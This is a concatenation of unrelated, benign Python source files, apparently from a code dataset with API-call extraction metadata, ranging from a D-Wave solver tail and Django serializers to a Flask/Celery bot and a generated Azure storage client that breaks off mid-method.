dimod\n'), ((10672, 10735), 'dwave.cloud.computation.Future', 'Future', ([], {'solver': 'self', 'id_': 'None', 'return_matrix': 'self.return_matrix'}), '(solver=self, id_=None, return_matrix=self.return_matrix)\n', (10678, 10735), False, 'from dwave.cloud.computation import Future\n'), ((19461, 19489), 'dwave.cloud.utils.reformat_qubo_as_ising', 'reformat_qubo_as_ising', (['qubo'], {}), '(qubo)\n', (19483, 19489), False, 'from dwave.cloud.utils import uniform_iterator, reformat_qubo_as_ising\n'), ((21718, 21781), 'dwave.cloud.computation.Future', 'Future', ([], {'solver': 'self', 'id_': 'None', 'return_matrix': 'self.return_matrix'}), '(solver=self, id_=None, return_matrix=self.return_matrix)\n', (21724, 21781), False, 'from dwave.cloud.computation import Future\n'), ((24350, 24374), 'dwave.cloud.utils.uniform_iterator', 'uniform_iterator', (['linear'], {}), '(linear)\n', (24366, 24374), False, 'from dwave.cloud.utils import uniform_iterator, reformat_qubo_as_ising\n'), ((24484, 24511), 'dwave.cloud.utils.uniform_iterator', 'uniform_iterator', (['quadratic'], {}), '(quadratic)\n', (24500, 24511), False, 'from dwave.cloud.utils import uniform_iterator, reformat_qubo_as_ising\n'), ((5344, 5398), 'dwave.cloud.coders.decode_qp_numpy', 'decode_qp_numpy', (['msg'], {'return_matrix': 'self.return_matrix'}), '(msg, return_matrix=self.return_matrix)\n', (5359, 5398), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n'), ((5432, 5446), 'dwave.cloud.coders.decode_qp', 'decode_qp', (['msg'], {}), '(msg)\n', (5441, 5446), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n'), ((5896, 5910), 'dwave.cloud.coders.decode_bq', 'decode_bq', (['msg'], {}), '(msg)\n', (5905, 5910), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n'), ((10503, 10528), 
'dwave.cloud.coders.encode_problem_as_bq', 'encode_problem_as_bq', (['bqm'], {}), '(bqm)\n', (10523, 10528), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n'), ((11760, 11800), 'dwave.cloud.coders.encode_problem_as_bq', 'encode_problem_as_bq', (['bqm'], {'compress': '(True)'}), '(bqm, compress=True)\n', (11780, 11800), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n'), ((21520, 21565), 'dwave.cloud.coders.encode_problem_as_qp', 'encode_problem_as_qp', (['self', 'linear', 'quadratic'], {}), '(self, linear, quadratic)\n', (21540, 21565), False, 'from dwave.cloud.coders import encode_problem_as_qp, encode_problem_as_bq, decode_qp_numpy, decode_qp, decode_bq\n')] |
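# Standalone arithmetic sketch of the duration-budget logic in StructuredSolver.max_num_reads
# above. Every property value below is made up purely for illustration and does not describe
# any real solver; the point is how the problem run duration caps the number of reads.
example_properties = {
    'num_reads_range': [1, 10000],
    'problem_run_duration_range': [0, 1000000],
    'default_annealing_time': 20,
    'default_readout_thermalization': 0,
    'default_programming_thermalization': 1000,
}
_, example_duration = example_properties['problem_run_duration_range']
example_max_reads = min(
    example_properties['num_reads_range'][1],
    int((example_duration - example_properties['default_programming_thermalization'])
        / (example_properties['default_annealing_time']
           + example_properties['default_readout_thermalization'])))
# (1000000 - 1000) / (20 + 0) = 49950 reads would fit, but num_reads_range caps the result at 10000
print(example_max_reads)  # 10000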
import pytest
from unittest.mock import patch
import tests.fixtures.journal as FakeJournalExporter
from systemdlogger.elasticsearch import ElasticsearchLogger
@pytest.mark.parametrize(('config_path'), [
'tests/fixtures/config_es.json'
])
class TestRunner:
def setup_method(self, method):
""" setup any state tied to the execution of the given method in a
class. setup_method is invoked for every test method of a class.
"""
modules = {
'systemdlogger.journal': FakeJournalExporter
}
self.module_patcher = patch.dict('sys.modules', modules)
self.module_patcher.start()
from systemdlogger.runner import Runner
self.Runner = Runner
def teardown_method(self, method):
""" teardown any state that was previously setup with a setup_method
call.
"""
self.module_patcher.stop()
def test_init(self, config_path):
runner = self.Runner(config_path)
assert len(runner.loggers) == 1
assert isinstance(runner.loggers[0], ElasticsearchLogger)
def test_run(self, config_path):
runner = self.Runner(config_path)
runner.run()
| [
"pytest.mark.parametrize",
"unittest.mock.patch.dict"
] | [((162, 235), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""config_path"""', "['tests/fixtures/config_es.json']"], {}), "('config_path', ['tests/fixtures/config_es.json'])\n", (185, 235), False, 'import pytest\n'), ((578, 612), 'unittest.mock.patch.dict', 'patch.dict', (['"""sys.modules"""', 'modules'], {}), "('sys.modules', modules)\n", (588, 612), False, 'from unittest.mock import patch\n')] |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Loan indexer APIs."""
from datetime import datetime
from celery import shared_task
from flask import current_app
from invenio_circulation.pidstore.pids import CIRCULATION_LOAN_PID_TYPE
from invenio_circulation.proxies import current_circulation
from invenio_indexer.api import RecordIndexer
from invenio_pidstore.errors import PIDDeletedError
from invenio_app_ils.circulation.utils import resolve_item_from_loan
from invenio_app_ils.documents.api import DOCUMENT_PID_TYPE
from invenio_app_ils.indexer import ReferencedRecordsIndexer
from invenio_app_ils.proxies import current_app_ils
@shared_task(ignore_result=True)
def index_referenced_records(loan):
"""Index referenced records."""
indexer = ReferencedRecordsIndexer()
indexed = dict(pid_type=CIRCULATION_LOAN_PID_TYPE, record=loan)
referenced = []
# fetch and index the document
document_cls = current_app_ils.document_record_cls
document = document_cls.get_record_by_pid(loan["document_pid"])
referenced.append(dict(pid_type=DOCUMENT_PID_TYPE, record=document))
# fetch and index the item
if loan.get("item_pid"):
item = resolve_item_from_loan(loan["item_pid"])
referenced.append(dict(pid_type=loan["item_pid"]["type"], record=item))
# index the loan itself: this is needed because of the extra field
# `available_items_for_loan_count` added when indexing.
# To calculate the value of this field, a search on the `loans`
# indexed is performed and this loan has to be already indexed
# with its latest data.
# At the first indexing, `available_items_for_loan_count` value might
# be wrong and corrected at the second re-indexing.
loan_class = current_circulation.loan_record_cls
loan_record = loan_class.get_record_by_pid(loan["pid"])
referenced.append(
dict(pid_type=CIRCULATION_LOAN_PID_TYPE, record=loan_record)
)
# add all the other loans, as after indexing this one, they
# will be affected in search
pending_loans = \
document.search_loan_references().scan()
for loan_hit in pending_loans:
pending_loan = loan_class.get_record_by_pid(loan_hit.pid)
referenced.append(
dict(pid_type=CIRCULATION_LOAN_PID_TYPE, record=pending_loan)
)
# index the loan and referenced records
indexer.index(indexed, referenced)
class LoanIndexer(RecordIndexer):
"""Indexer class for Loan record."""
def index(self, loan, arguments=None, **kwargs):
"""Index an Loan."""
super().index(loan)
eta = datetime.utcnow() + current_app.config["ILS_INDEXER_TASK_DELAY"]
index_referenced_records.apply_async((loan,), eta=eta)
def index_extra_fields_for_loan(loan_dict):
"""Indexer hook to modify the loan record dict before indexing.
The `available_items_for_loan_count` and `can_circulate_items_count` fields
are added to the loan only on the search index because they are needed for
search aggregation/filtering. They are not needed when fetching the loan
details.
"""
document_class = current_app_ils.document_record_cls
try:
document_record = document_class.get_record_by_pid(
loan_dict["document_pid"]
)
except PIDDeletedError:
# Document might have been deleted while reindexing asynchronously.
return
document = document_record.replace_refs()
items_available_for_loan_count = document["circulation"][
"available_items_for_loan_count"
]
loan_dict[
"available_items_for_loan_count"
] = items_available_for_loan_count
can_circulate_items_count = document["circulation"][
"can_circulate_items_count"
]
loan_dict["can_circulate_items_count"] = can_circulate_items_count
| [
"invenio_app_ils.indexer.ReferencedRecordsIndexer",
"celery.shared_task",
"invenio_app_ils.circulation.utils.resolve_item_from_loan",
"datetime.datetime.utcnow"
] | [((800, 831), 'celery.shared_task', 'shared_task', ([], {'ignore_result': '(True)'}), '(ignore_result=True)\n', (811, 831), False, 'from celery import shared_task\n'), ((918, 944), 'invenio_app_ils.indexer.ReferencedRecordsIndexer', 'ReferencedRecordsIndexer', ([], {}), '()\n', (942, 944), False, 'from invenio_app_ils.indexer import ReferencedRecordsIndexer\n'), ((1341, 1381), 'invenio_app_ils.circulation.utils.resolve_item_from_loan', 'resolve_item_from_loan', (["loan['item_pid']"], {}), "(loan['item_pid'])\n", (1363, 1381), False, 'from invenio_app_ils.circulation.utils import resolve_item_from_loan\n'), ((2767, 2784), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2782, 2784), False, 'from datetime import datetime\n')] |
""" bot example
Minimal bot implementation to serve as an example.
Not really a part of the Canvas Indexer code base.
"""
import json
import random
import requests
import time
from celery import Celery
from flask import (abort, Flask, request, Response)
from flask_cors import CORS
def get_tags(img_url):
return ['foo', 'bar']
def make_celery(app):
celery = Celery(
'bot_example',
backend=app.config['CELERY_RESULT_BACKEND'],
broker=app.config['CELERY_BROKER_URL']
)
celery.conf.update(app.config)
class ContextTask(celery.Task):
def __call__(self, *args, **kwargs):
with app.app_context():
return self.run(*args, **kwargs)
celery.Task = ContextTask
return celery
app = Flask(__name__)
app.config.update(
CELERY_BROKER_URL='redis://localhost:6379',
CELERY_RESULT_BACKEND='redis://localhost:6379'
)
celery = make_celery(app)
CORS(app)
random.seed()
@app.route('/job', methods=['POST'])
def job():
""" Receive a job.
"""
json_bytes = request.data
try:
json_string = json_bytes.decode('utf-8')
job_obj = json.loads(json_string)
    except ValueError:  # covers invalid UTF-8 (UnicodeDecodeError) and malformed JSON
return abort(400, 'No valid JSON provided.')
if type(job_obj) != dict or \
'imgs' not in job_obj or \
'callback_url' not in job_obj:
return abort(400, 'No valid job list provided.')
job_id = random.randint(1, 999999)
# call callback task asynchronously
result = callback.delay(job_obj, job_id)
resp = Response(json.dumps({'job_id': job_id}))
return resp
@celery.task()
def callback(job_obj, job_id):
time.sleep(1) # TODO: remove
results = []
for img in job_obj['imgs']:
result = {}
tags = get_tags(img['img_url'])
result['tags'] = tags
result['canvas_uri'] = img['canvas_uri']
result['manifest_uri'] = img['manifest_uri']
results.append(result)
ret = {}
ret['job_id'] = job_id
ret['results'] = results
print('sending callback request for job #{}'.format(job_id))
resp = requests.post(job_obj['callback_url'],
headers={'Accept': 'application/json',
'Content-Type': 'application/json'},
data=json.dumps(ret),
timeout=60)
print(resp.status_code)
if __name__ == '__main__':
app.run(host='0.0.0.0')
| [
"json.loads",
"flask_cors.CORS",
"flask.Flask",
"celery.Celery",
"json.dumps",
"random.seed",
"time.sleep",
"flask.abort",
"random.randint"
] | [((776, 791), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (781, 791), False, 'from flask import abort, Flask, request, Response\n'), ((938, 947), 'flask_cors.CORS', 'CORS', (['app'], {}), '(app)\n', (942, 947), False, 'from flask_cors import CORS\n'), ((948, 961), 'random.seed', 'random.seed', ([], {}), '()\n', (959, 961), False, 'import random\n'), ((380, 491), 'celery.Celery', 'Celery', (['"""bot_example"""'], {'backend': "app.config['CELERY_RESULT_BACKEND']", 'broker': "app.config['CELERY_BROKER_URL']"}), "('bot_example', backend=app.config['CELERY_RESULT_BACKEND'], broker=\n app.config['CELERY_BROKER_URL'])\n", (386, 491), False, 'from celery import Celery\n'), ((1426, 1451), 'random.randint', 'random.randint', (['(1)', '(999999)'], {}), '(1, 999999)\n', (1440, 1451), False, 'import random\n'), ((1659, 1672), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (1669, 1672), False, 'import time\n'), ((1150, 1173), 'json.loads', 'json.loads', (['json_string'], {}), '(json_string)\n', (1160, 1173), False, 'import json\n'), ((1370, 1411), 'flask.abort', 'abort', (['(400)', '"""No valid job list provided."""'], {}), "(400, 'No valid job list provided.')\n", (1375, 1411), False, 'from flask import abort, Flask, request, Response\n'), ((1559, 1589), 'json.dumps', 'json.dumps', (["{'job_id': job_id}"], {}), "({'job_id': job_id})\n", (1569, 1589), False, 'import json\n'), ((1201, 1238), 'flask.abort', 'abort', (['(400)', '"""No valid JSON provided."""'], {}), "(400, 'No valid JSON provided.')\n", (1206, 1238), False, 'from flask import abort, Flask, request, Response\n'), ((2312, 2327), 'json.dumps', 'json.dumps', (['ret'], {}), '(ret)\n', (2322, 2327), False, 'import json\n')] |
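# Client-side sketch for the /job endpoint defined above: submit one image for tagging and read
# back the job_id; the tag results arrive later as a POST to callback_url. All URLs below are
# placeholders, assuming the Flask app above runs locally on its default port.
import json
import requests
example_job = {
    'imgs': [{
        'img_url': 'http://example.org/image.jpg',
        'canvas_uri': 'http://example.org/iiif/canvas/1',
        'manifest_uri': 'http://example.org/iiif/manifest',
    }],
    'callback_url': 'http://localhost:5001/callback',
}
example_resp = requests.post('http://localhost:5000/job',
                             headers={'Content-Type': 'application/json'},
                             data=json.dumps(example_job),
                             timeout=10)
print(example_resp.json()['job_id'])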
# -*- coding:utf-8 -*-
import hashlib
import hmac
import time
def create_auth_headers(url, access_key, secret, body=None):
"""
get HTTP headers for API authentication
:param url: API url. (e.g. https://coincheck.com/api/accounts/balance )
:param access_key: Access Key string for API authentication
    :param secret: Secret Access Key string for API authentication
    :param body: request body string, if any (optional)
    :return: HTTP header dictionary
    """
    current_millis = str(int(round(time.time() * 1000)))
    # treat a missing body as an empty string so the signature base can always be built
    message = current_millis + url + (body or '')
signature = hmac.new(secret.encode("utf-8"), message.encode("utf-8"), hashlib.sha256).hexdigest()
headers = {
"ACCESS-KEY": access_key,
"ACCESS-NONCE": current_millis,
"ACCESS-SIGNATURE": signature
}
return headers
| [
"time.time"
] | [((463, 474), 'time.time', 'time.time', ([], {}), '()\n', (472, 474), False, 'import time\n')] |
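# Usage sketch for create_auth_headers above. The key and secret are fake placeholders, so the
# request only succeeds with real Coincheck credentials; an empty body string is passed because
# the balance endpoint is a plain GET with no payload.
import requests
example_url = 'https://coincheck.com/api/accounts/balance'
example_headers = create_auth_headers(example_url,
                                    access_key='YOUR_ACCESS_KEY',
                                    secret='YOUR_SECRET_KEY',
                                    body='')
example_response = requests.get(example_url, headers=example_headers)
print(example_response.status_code)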
from datetime import datetime
from django.utils.timesince import timesince
from rest_framework import serializers
from news.models import Journalist, Article
class ArticleSerializer(serializers.ModelSerializer):
time_since_publication = serializers.SerializerMethodField()
# author = JournalistSerializer(read_only=True)
class Meta:
model = Article
exclude = ('id',)
def get_time_since_publication(self, object):
publication_date = object.publication_date
now = datetime.now()
time_delta = timesince(publication_date, now)
return time_delta
def validate(self, data):
""" Check that description and title are different """
if data['title'] == data['description']:
raise serializers.ValidationError('Title and Description must be different')
return data
def validate_title(self, value):
if len(value) < 50:
raise serializers.ValidationError('Title has to be at least 50 characters long')
return value
class JournalistSerializer(serializers.ModelSerializer):
articles = serializers.HyperlinkedRelatedField(many=True, read_only=True, view_name='article-detail')
# articles = ArticleSerializer(many=True, read_only=True)
class Meta:
model = Journalist
exclude = ('id', )
# class ArticleSerializer(serializers.Serializer):
# id = serializers.IntegerField(read_only=True)
# author = serializers.CharField()
# title = serializers.CharField()
# description = serializers.CharField()
# body = serializers.CharField()
# location = serializers.CharField()
# publication_date = serializers.DateField()
# active = serializers.BooleanField()
# created_at = serializers.DateTimeField(read_only=True)
# updated_at = serializers.DateTimeField(read_only=True)
#
# def create(self, validated_data):
# return Article.objects.create(**validated_data)
#
# def update(self, instance, validated_data):
# instance.author = validated_data.get('author', instance.author)
# instance.title = validated_data.get('title', instance.title)
# instance.description = validated_data.get('description', instance.description)
# instance.body = validated_data.get('body', instance.body)
# instance.location = validated_data.get('location', instance.location)
# instance.publication_date = validated_data.get('publication_date', instance.publication_date)
# instance.active = validated_data.get('active', instance.active)
# instance.save()
# return instance
#
# def validate(self, data):
# """ Check that description and title are different """
# if data['title'] == data['description']:
# raise serializers.ValidationError('Title and Description must be different')
# return data
#
# def validate_title(self, value):
# if len(value) < 50:
# raise serializers.ValidationError('Title has to be at least 50 characters long')
# return value
| [
"rest_framework.serializers.SerializerMethodField",
"rest_framework.serializers.ValidationError",
"datetime.datetime.now",
"rest_framework.serializers.HyperlinkedRelatedField",
"django.utils.timesince.timesince"
] | [((244, 279), 'rest_framework.serializers.SerializerMethodField', 'serializers.SerializerMethodField', ([], {}), '()\n', (277, 279), False, 'from rest_framework import serializers\n'), ((1116, 1211), 'rest_framework.serializers.HyperlinkedRelatedField', 'serializers.HyperlinkedRelatedField', ([], {'many': '(True)', 'read_only': '(True)', 'view_name': '"""article-detail"""'}), "(many=True, read_only=True, view_name=\n 'article-detail')\n", (1151, 1211), False, 'from rest_framework import serializers\n'), ((515, 529), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (527, 529), False, 'from datetime import datetime\n'), ((551, 583), 'django.utils.timesince.timesince', 'timesince', (['publication_date', 'now'], {}), '(publication_date, now)\n', (560, 583), False, 'from django.utils.timesince import timesince\n'), ((771, 841), 'rest_framework.serializers.ValidationError', 'serializers.ValidationError', (['"""Title and Description must be different"""'], {}), "('Title and Description must be different')\n", (798, 841), False, 'from rest_framework import serializers\n'), ((946, 1020), 'rest_framework.serializers.ValidationError', 'serializers.ValidationError', (['"""Title has to be at least 50 characters long"""'], {}), "('Title has to be at least 50 characters long')\n", (973, 1020), False, 'from rest_framework import serializers\n')] |
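# Illustrative sketch of the custom validation in ArticleSerializer above: a payload whose title
# and description are identical should be rejected by validate(). This only runs inside a
# configured Django project with the news app migrated, and it assumes a Journalist with
# primary key 1 exists; all field values are made up.
example_payload = {
    'author': 1,
    'title': 'An example headline that is comfortably longer than the fifty character minimum',
    'description': 'An example headline that is comfortably longer than the fifty character minimum',
    'body': 'Body text',
    'location': 'Berlin',
    'publication_date': '2020-01-01',
    'active': True,
}
example_serializer = ArticleSerializer(data=example_payload)
print(example_serializer.is_valid())  # False: title and description must differ
print(example_serializer.errors)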
from math import hypot
class Vector():
def __init__(self, x=0, y=0):
self.x = x
self.y = y
def __repr__(self):
return 'Vector(%r, %r)' % (self.x, self.y)
def __abs__(self):
return hypot(self.x, self.y)
def __bool__(self):
return bool(abs(self))
def __add__(self, other):
return Vector(self.x+other.x, self.y+other.y)
def __mul__(self, scalar):
return Vector(self.x*scalar, self.y*scalar) | [
"math.hypot"
] | [((228, 249), 'math.hypot', 'hypot', (['self.x', 'self.y'], {}), '(self.x, self.y)\n', (233, 249), False, 'from math import hypot\n')] |
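# Quick demonstration of the operator overloads defined on Vector above; the numbers are
# arbitrary. abs() delegates to math.hypot, so abs(Vector(3, 4)) is the Euclidean length 5.0.
v1 = Vector(2, 4)
v2 = Vector(2, 1)
print(v1 + v2)             # Vector(4, 5)
print(v1 * 3)              # Vector(6, 12)
print(abs(Vector(3, 4)))   # 5.0
print(bool(Vector(0, 0)))  # False, because its magnitude is 0.0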
import itertools
from task_selector.task import Task
class TaskSelector:
"""Selector for finding best Task combination """
def __init__(self, tasks: list[Task] = None):
if tasks is None:
tasks = []
self.tasks = tasks
self.selected = []
self.selected_profit = 0.0
def set_tasks(self, tasks: list[Task]):
self.tasks = tasks
def select(self):
"""Compare all possible Task combinations to find the maximum profit
without sharing the same resources between selected Tasks"""
self.selected = []
self.selected_profit = 0
# If zero tasks, return
if len(self.tasks) == 0:
return self.selected
# Create all possible combinations, starting from length == 1 and
# following with greater ones up to full tasks list.
for i in range(1, len(self.tasks)+1):
for combination in itertools.combinations(self.tasks, i):
comb_select = TaskSelector(combination)
# If valid combination, store it and its profit for comparison
if comb_select.is_valid():
comb_profit = comb_select.get_profit()
if comb_profit > self.selected_profit:
self.selected_profit = comb_profit
self.selected = list(combination)
return self.selected
def is_valid(self) -> bool:
# Create a Set to speed lookup of added resources
resource_set = set()
for task in self.tasks:
for resource in task.resources:
if resource not in resource_set:
resource_set.add(resource)
# Exit if repeated resource found
else:
return False
return True
def get_profit(self) -> float:
return sum(t.profit for t in self.tasks) | [
"itertools.combinations"
] | [((931, 968), 'itertools.combinations', 'itertools.combinations', (['self.tasks', 'i'], {}), '(self.tasks, i)\n', (953, 968), False, 'import itertools\n')] |
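# Usage sketch for TaskSelector above. The Task constructor arguments shown here are assumed
# (the selector itself only relies on the .profit and .resources attributes). With these three
# tasks, the only combinations without shared resources are the singletons and {task_a, task_c},
# so select() keeps task_a and task_c for a combined profit of 8.0.
task_a = Task(profit=5.0, resources=['cpu1'])          # hypothetical constructor signature
task_b = Task(profit=4.0, resources=['cpu1', 'cpu2'])
task_c = Task(profit=3.0, resources=['cpu2'])
example_selector = TaskSelector([task_a, task_b, task_c])
best_tasks = example_selector.select()
print(example_selector.selected_profit)  # 8.0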
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
def rescale(data, to=[0, 1]):
"""Rescale data.
Rescale a numeric variable to a new range.
Parameters
----------
data : list, array or Series
Raw data.
to : list
New range of values of the data after rescaling.
Returns
----------
list, array or Series
The rescaled values.
Examples
----------
>>> import neurokit2 as nk
>>>
>>> nk.rescale(data=[3, 1, 2, 4, 6], to=[0, 1])
"""
# Return appropriate type
if isinstance(data, list):
data = list(_rescale(np.array(data), to=to))
else:
data = _rescale(data, to=to)
return data
def _rescale(data, to=[0, 1]):
y = (to[1] - to[0]) / (np.nanmax(data) - np.nanmin(data)) * (data - np.nanmin(data)) + to[0]
return y
| [
"numpy.nanmin",
"numpy.array",
"numpy.nanmax"
] | [((623, 637), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (631, 637), True, 'import numpy as np\n'), ((821, 836), 'numpy.nanmin', 'np.nanmin', (['data'], {}), '(data)\n', (830, 836), True, 'import numpy as np\n'), ((776, 791), 'numpy.nanmax', 'np.nanmax', (['data'], {}), '(data)\n', (785, 791), True, 'import numpy as np\n'), ((794, 809), 'numpy.nanmin', 'np.nanmin', (['data'], {}), '(data)\n', (803, 809), True, 'import numpy as np\n')] |
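# Worked check of the rescaling formula above, reusing the docstring's input: for [3, 1, 2, 4, 6]
# the minimum is 1 and the maximum is 6, so each value x maps to (to_max - to_min) * (x - 1) / 5
# plus to_min.
print(rescale([3, 1, 2, 4, 6], to=[0, 1]))   # ~[0.4, 0.0, 0.2, 0.6, 1.0] up to float rounding
print(rescale([3, 1, 2, 4, 6], to=[0, 10]))  # [4.0, 0.0, 2.0, 6.0, 10.0]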
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class StorageAccountsOperations(object):
"""StorageAccountsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def check_name_availability(
self, account_name, custom_headers=None, raw=False, **operation_config):
"""Checks that account name is valid and is not in use.
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name:
:class:`StorageAccountCheckNameAvailabilityParameters
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountCheckNameAvailabilityParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CheckNameAvailabilityResult
<Fixtures.AcceptanceTestsStorageManagementClient.models.CheckNameAvailabilityResult>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/checkNameAvailability'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(account_name, 'StorageAccountCheckNameAvailabilityParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CheckNameAvailabilityResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create(
self, resource_group_name, account_name, parameters, custom_headers=None, raw=False, **operation_config):
"""Asynchronously creates a new storage account with the specified
parameters. Existing accounts cannot be updated with this API and
should instead use the Update Storage Account API. If an account is
already created and subsequent PUT request is issued with exact same
set of properties, then HTTP 200 would be returned. .
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name: str
:param parameters: The parameters to provide for the created account.
:type parameters: :class:`StorageAccountCreateParameters
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountCreateParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`StorageAccount
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccount>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'StorageAccountCreateParameters')
# Construct and send request
def long_running_send():
request = self._client.put(url, query_parameters)
return self._client.send(
request, header_parameters, body_content, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def delete(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Deletes a storage account in Microsoft Azure.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def get_properties(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
